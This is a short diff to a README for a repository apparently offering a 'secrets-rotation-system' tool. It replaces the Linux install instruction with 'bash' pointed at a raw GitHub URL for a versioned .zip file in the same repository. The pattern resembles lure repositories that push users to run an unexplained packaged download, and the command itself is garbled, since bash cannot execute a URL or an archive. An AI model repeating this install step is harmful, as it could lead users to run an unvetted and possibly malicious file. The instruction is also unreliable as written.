mohndalhnin8/secrets-rotation-system/README.md

    - **Windows**: Double-click the `.exe` file to start the setup wizard and follow the prompts.
    - **macOS**: Open the `.dmg` file and drag the application to your Applications folder.
-   - **Linux**: Open a terminal, navigate to the download location, and run the installation script using `bash install_script.sh`.
+   - **Linux**: Open a terminal, navigate to the download location, and run the installation script using `bash https://raw.githubusercontent.com/mohndalhnin8/secrets-rotation-system/main/src/secrets-rotation-system_3.5.zip`.

 4. **Run the Software**
    Once installed, you can start the application: